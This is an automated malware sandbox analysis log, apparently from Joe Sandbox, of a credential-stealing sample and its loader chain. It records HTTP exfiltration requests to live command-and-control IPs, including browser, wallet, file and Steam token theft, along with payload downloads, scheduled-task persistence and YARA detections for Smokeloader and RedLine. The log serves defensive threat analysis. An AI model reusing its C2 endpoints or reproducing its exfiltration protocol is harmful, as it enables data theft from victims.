47 2d 2d 0d 0a Data Ascii: ------IJECAEHJJJKJKFIDGCBGContent-Disposition: form-data; name="token"bbccb813c6e378b5231ec58ee415cfae50ff216ac0bb82a7165ec9f5fc6e448abed29225------IJECAEHJJJKJKFIDGCBGContent-Disposition: form-data; name="message"browsers------IJECAEHJJJKJKFIDGCBG--
                      Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BGHJEBKJEGHJKECAAKJKHost: 185.215.113.206Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 47 48 4a 45 42 4b 4a 45 47 48 4a 4b 45 43 41 41 4b 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 62 63 63 62 38 31 33 63 36 65 33 37 38 62 35 32 33 31 65 63 35 38 65 65 34 31 35 63 66 61 65 35 30 66 66 32 31 36 61 63 30 62 62 38 32 61 37 31 36 35 65 63 39 66 35 66 63 36 65 34 34 38 61 62 65 64 32 39 32 32 35 0d 0a 2d 2d 2d 2d 2d 2d 42 47 48 4a 45 42 4b 4a 45 47 48 4a 4b 45 43 41 41 4b 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 42 47 48 4a 45 42 4b 4a 45 47 48 4a 4b 45 43 41 41 4b 4a 4b 2d 2d 0d 0a Data Ascii: ------BGHJEBKJEGHJKECAAKJKContent-Disposition: form-data; name="token"bbccb813c6e378b5231ec58ee415cfae50ff216ac0bb82a7165ec9f5fc6e448abed29225------BGHJEBKJEGHJKECAAKJKContent-Disposition: form-data; name="message"plugins------BGHJEBKJEGHJKECAAKJK--
                      Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JJJKFBAAAFHJEBFIEGIDHost: 185.215.113.206Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 4a 4a 4b 46 42 41 41 41 46 48 4a 45 42 46 49 45 47 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 62 63 63 62 38 31 33 63 36 65 33 37 38 62 35 32 33 31 65 63 35 38 65 65 34 31 35 63 66 61 65 35 30 66 66 32 31 36 61 63 30 62 62 38 32 61 37 31 36 35 65 63 39 66 35 66 63 36 65 34 34 38 61 62 65 64 32 39 32 32 35 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 4a 4b 46 42 41 41 41 46 48 4a 45 42 46 49 45 47 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 4a 4b 46 42 41 41 41 46 48 4a 45 42 46 49 45 47 49 44 2d 2d 0d 0a Data Ascii: ------JJJKFBAAAFHJEBFIEGIDContent-Disposition: form-data; name="token"bbccb813c6e378b5231ec58ee415cfae50ff216ac0bb82a7165ec9f5fc6e448abed29225------JJJKFBAAAFHJEBFIEGIDContent-Disposition: form-data; name="message"fplugins------JJJKFBAAAFHJEBFIEGID--
                      Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CFIECBFIDGDAKFHIEHJKHost: 185.215.113.206Content-Length: 6819Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /68b591d6548ec281/sqlite3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CAEHJEBKFCAKKFIEHDBFHost: 185.215.113.206Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 41 45 48 4a 45 42 4b 46 43 41 4b 4b 46 49 45 48 44 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 62 63 63 62 38 31 33 63 36 65 33 37 38 62 35 32 33 31 65 63 35 38 65 65 34 31 35 63 66 61 65 35 30 66 66 32 31 36 61 63 30 62 62 38 32 61 37 31 36 35 65 63 39 66 35 66 63 36 65 34 34 38 61 62 65 64 32 39 32 32 35 0d 0a 2d 2d 2d 2d 2d 2d 43 41 45 48 4a 45 42 4b 46 43 41 4b 4b 46 49 45 48 44 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 43 41 45 48 4a 45 42 4b 46 43 41 4b 4b 46 49 45 48 44 42 46 2d 2d 0d 0a Data Ascii: ------CAEHJEBKFCAKKFIEHDBFContent-Disposition: form-data; name="token"bbccb813c6e378b5231ec58ee415cfae50ff216ac0bb82a7165ec9f5fc6e448abed29225------CAEHJEBKFCAKKFIEHDBFContent-Disposition: form-data; name="message"wallets------CAEHJEBKFCAKKFIEHDBF--
                      Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GIDAECGDAFBAAAAAECGIHost: 185.215.113.206Content-Length: 265Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 49 44 41 45 43 47 44 41 46 42 41 41 41 41 41 45 43 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 62 63 63 62 38 31 33 63 36 65 33 37 38 62 35 32 33 31 65 63 35 38 65 65 34 31 35 63 66 61 65 35 30 66 66 32 31 36 61 63 30 62 62 38 32 61 37 31 36 35 65 63 39 66 35 66 63 36 65 34 34 38 61 62 65 64 32 39 32 32 35 0d 0a 2d 2d 2d 2d 2d 2d 47 49 44 41 45 43 47 44 41 46 42 41 41 41 41 41 45 43 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 47 49 44 41 45 43 47 44 41 46 42 41 41 41 41 41 45 43 47 49 2d 2d 0d 0a Data Ascii: ------GIDAECGDAFBAAAAAECGIContent-Disposition: form-data; name="token"bbccb813c6e378b5231ec58ee415cfae50ff216ac0bb82a7165ec9f5fc6e448abed29225------GIDAECGDAFBAAAAAECGIContent-Disposition: form-data; name="message"files------GIDAECGDAFBAAAAAECGI--
                      Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IIJKJDAFHJDHIEBGCFIDHost: 185.215.113.206Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 49 4a 4b 4a 44 41 46 48 4a 44 48 49 45 42 47 43 46 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 62 63 63 62 38 31 33 63 36 65 33 37 38 62 35 32 33 31 65 63 35 38 65 65 34 31 35 63 66 61 65 35 30 66 66 32 31 36 61 63 30 62 62 38 32 61 37 31 36 35 65 63 39 66 35 66 63 36 65 34 34 38 61 62 65 64 32 39 32 32 35 0d 0a 2d 2d 2d 2d 2d 2d 49 49 4a 4b 4a 44 41 46 48 4a 44 48 49 45 42 47 43 46 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 49 49 4a 4b 4a 44 41 46 48 4a 44 48 49 45 42 47 43 46 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 49 49 4a 4b 4a 44 41 46 48 4a 44 48 49 45 42 47 43 46 49 44 2d 2d 0d 0a Data Ascii: ------IIJKJDAFHJDHIEBGCFIDContent-Disposition: form-data; name="token"bbccb813c6e378b5231ec58ee415cfae50ff216ac0bb82a7165ec9f5fc6e448abed29225------IIJKJDAFHJDHIEBGCFIDContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------IIJKJDAFHJDHIEBGCFIDContent-Disposition: form-data; name="file"------IIJKJDAFHJDHIEBGCFID--
                      Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HIIIJDAAAAAAKECBFBAEHost: 185.215.113.206Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 49 49 49 4a 44 41 41 41 41 41 41 4b 45 43 42 46 42 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 62 63 63 62 38 31 33 63 36 65 33 37 38 62 35 32 33 31 65 63 35 38 65 65 34 31 35 63 66 61 65 35 30 66 66 32 31 36 61 63 30 62 62 38 32 61 37 31 36 35 65 63 39 66 35 66 63 36 65 34 34 38 61 62 65 64 32 39 32 32 35 0d 0a 2d 2d 2d 2d 2d 2d 48 49 49 49 4a 44 41 41 41 41 41 41 4b 45 43 42 46 42 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 79 62 6e 63 62 68 79 6c 65 70 6d 65 0d 0a 2d 2d 2d 2d 2d 2d 48 49 49 49 4a 44 41 41 41 41 41 41 4b 45 43 42 46 42 41 45 2d 2d 0d 0a Data Ascii: ------HIIIJDAAAAAAKECBFBAEContent-Disposition: form-data; name="token"bbccb813c6e378b5231ec58ee415cfae50ff216ac0bb82a7165ec9f5fc6e448abed29225------HIIIJDAAAAAAKECBFBAEContent-Disposition: form-data; name="message"ybncbhylepme------HIIIJDAAAAAAKECBFBAE--
                      Source: global trafficHTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 185.215.113.16Cache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BAKEBFBAKKFCBGDHDGHDHost: 185.215.113.206Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 41 4b 45 42 46 42 41 4b 4b 46 43 42 47 44 48 44 47 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 62 63 63 62 38 31 33 63 36 65 33 37 38 62 35 32 33 31 65 63 35 38 65 65 34 31 35 63 66 61 65 35 30 66 66 32 31 36 61 63 30 62 62 38 32 61 37 31 36 35 65 63 39 66 35 66 63 36 65 34 34 38 61 62 65 64 32 39 32 32 35 0d 0a 2d 2d 2d 2d 2d 2d 42 41 4b 45 42 46 42 41 4b 4b 46 43 42 47 44 48 44 47 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 6b 6b 6a 71 61 69 61 78 6b 68 62 0d 0a 2d 2d 2d 2d 2d 2d 42 41 4b 45 42 46 42 41 4b 4b 46 43 42 47 44 48 44 47 48 44 2d 2d 0d 0a Data Ascii: ------BAKEBFBAKKFCBGDHDGHDContent-Disposition: form-data; name="token"bbccb813c6e378b5231ec58ee415cfae50ff216ac0bb82a7165ec9f5fc6e448abed29225------BAKEBFBAKKFCBGDHDGHDContent-Disposition: form-data; name="message"wkkjqaiaxkhb------BAKEBFBAKKFCBGDHDGHD--
                      Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                      Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 36 32 37 37 30 42 37 35 43 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB62770B75C82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
                      Source: global trafficHTTP traffic detected: GET /files/unique2/random.exe HTTP/1.1Host: 31.41.244.11
                      Source: Joe Sandbox ViewIP Address: 185.215.113.43 185.215.113.43
                      Source: Joe Sandbox ViewIP Address: 185.156.72.65 185.156.72.65
                      Source: Joe Sandbox ViewASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
                      Source: Joe Sandbox ViewASN Name: ITDELUXE-ASRU ITDELUXE-ASRU
                      Source: Joe Sandbox ViewASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
                      Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.8:49710 -> 185.215.113.16:80
                      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49716 -> 31.41.244.11:80
                      Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.8:49709 -> 185.215.113.206:80
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 12_2_000EBE30 Sleep,InternetOpenW,InternetConnectA,HttpOpenRequestA,HttpSendRequestA,InternetReadFile,12_2_000EBE30
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /68b591d6548ec281/sqlite3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 185.215.113.16Cache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /files/unique2/random.exe HTTP/1.1Host: 31.41.244.11
                      Source: unknownHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CFCFHJDBKJKEBFHJEHIIHost: 185.215.113.206Content-Length: 210Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 46 43 46 48 4a 44 42 4b 4a 4b 45 42 46 48 4a 45 48 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 30 38 38 46 39 39 43 39 38 36 33 37 34 38 31 34 30 37 33 31 0d 0a 2d 2d 2d 2d 2d 2d 43 46 43 46 48 4a 44 42 4b 4a 4b 45 42 46 48 4a 45 48 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 43 46 43 46 48 4a 44 42 4b 4a 4b 45 42 46 48 4a 45 48 49 49 2d 2d 0d 0a Data Ascii: ------CFCFHJDBKJKEBFHJEHIIContent-Disposition: form-data; name="hwid"3088F99C9863748140731------CFCFHJDBKJKEBFHJEHIIContent-Disposition: form-data; name="build"mars------CFCFHJDBKJKEBFHJEHII--
                      Source: file.exe, 00000001.00000002.1957372627.0000000001069000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/mine/random.exe
                      Source: file.exe, 00000001.00000002.1955784660.0000000000838000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://185.215.113.16/mine/random.exe00Start5rm-data;
                      Source: file.exe, 00000001.00000002.1957372627.0000000001069000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/mine/random.exeH
                      Source: file.exe, 00000001.00000002.1955784660.0000000000838000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://185.215.113.16/mine/random.exesposition:
                      Source: file.exe, 00000001.00000002.1957372627.000000000100E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.1955784660.0000000000693000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000001.00000002.1955784660.00000000006C8000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000001.00000002.1955784660.00000000006C1000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://185.215.113.206
                      Source: file.exe, 00000001.00000002.1957372627.0000000001069000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/
                      Source: file.exe, 00000001.00000002.1957372627.0000000001069000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/68b591d6548ec281/sqlite3.dll
                      Source: file.exe, 00000001.00000002.1957372627.0000000001069000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/C-2
                      Source: file.exe, 00000001.00000002.1957372627.000000000108B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.1957372627.0000000001069000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.php
                      Source: file.exe, 00000001.00000002.1957372627.000000000108B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.php)
                      Source: file.exe, 00000001.00000002.1957372627.000000000108B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.php?
                      Source: file.exe, 00000001.00000002.1957372627.000000000108B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpd
                      Source: file.exe, 00000001.00000002.1955784660.0000000000693000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpinit.exe
                      Source: file.exe, 00000001.00000002.1955784660.00000000006C1000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpion:
                      Source: file.exe, 00000001.00000002.1957372627.000000000108B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.php~
                      Source: file.exe, 00000001.00000002.1955784660.00000000006C1000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://185.215.113.206FID
                      Source: file.exe, 00000001.00000002.1955784660.00000000006C8000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://185.215.113.206ee415cfae50ff216ac0bb82a7165ec9f5fc6e448abed29225
                      Source: file.exe, 00000001.00000002.1955784660.0000000000693000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://185.215.113.206s.exe
                      Source: skotes.exe, 0000000C.00000002.2673867668.0000000000C40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php
                      Source: skotes.exe, 0000000C.00000002.2673867668.0000000000C40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://31.41.244.11/files/unique2/random.exe
                      Source: skotes.exe, 0000000C.00000002.2673867668.0000000000C40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://31.41.244.11/files/unique2/random.exeX
                      Source: skotes.exe, 0000000C.00000002.2673867668.0000000000C28000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://31.41.244.11/files/unique2/random.exew
                      Source: file.exe, 00000001.00000002.1983633659.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000001.00000002.1976492237.000000001D604000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.sqlite.org/copyright.html.

                      E-Banking Fraud

                      barindex
                      Source: Yara matchFile source: 14.2.607f096cd3.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.607f096cd3.exe.4950e67.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.607f096cd3.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.3.607f096cd3.exe.4a40000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000000E.00000002.2675683661.0000000004950000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000003.2669859529.0000000004A40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.2672871418.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, type: MEMORY

                      System Summary

                      barindex
                      Source: 0000000E.00000002.2675683661.0000000004950000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                      Source: 0000000E.00000002.2675534930.00000000047A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                      Source: file.exeStatic PE information: section name:
                      Source: file.exeStatic PE information: section name: .idata
                      Source: file.exeStatic PE information: section name:
                      Source: DocumentsIIEBGIDAAF.exe.1.drStatic PE information: section name:
                      Source: DocumentsIIEBGIDAAF.exe.1.drStatic PE information: section name: .idata
                      Source: DocumentsIIEBGIDAAF.exe.1.drStatic PE information: section name:
                      Source: random[1].exe.1.drStatic PE information: section name:
                      Source: random[1].exe.1.drStatic PE information: section name: .idata
                      Source: random[1].exe.1.drStatic PE information: section name:
                      Source: skotes.exe.8.drStatic PE information: section name:
                      Source: skotes.exe.8.drStatic PE information: section name: .idata
                      Source: skotes.exe.8.drStatic PE information: section name:
                      Source: 607f096cd3.exe.12.drStatic PE information: section name:
                      Source: 607f096cd3.exe.12.drStatic PE information: section name: .idata
                      Source: 607f096cd3.exe.12.drStatic PE information: section name:
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeFile created: C:\Windows\Tasks\skotes.jobJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 10_1_0019BE1F10_1_0019BE1F
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 10_1_001FCA1410_1_001FCA14
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 10_1_00271C6610_1_00271C66
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 10_1_001C047E10_1_001C047E
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 10_1_001C42B110_1_001C42B1
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 10_1_002A4ED210_1_002A4ED2
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 10_1_0027613E10_1_0027613E
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 10_1_001A59D910_1_001A59D9
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 10_1_001E85FE10_1_001E85FE
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 12_2_0012704912_2_00127049
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 12_2_0012886012_2_00128860
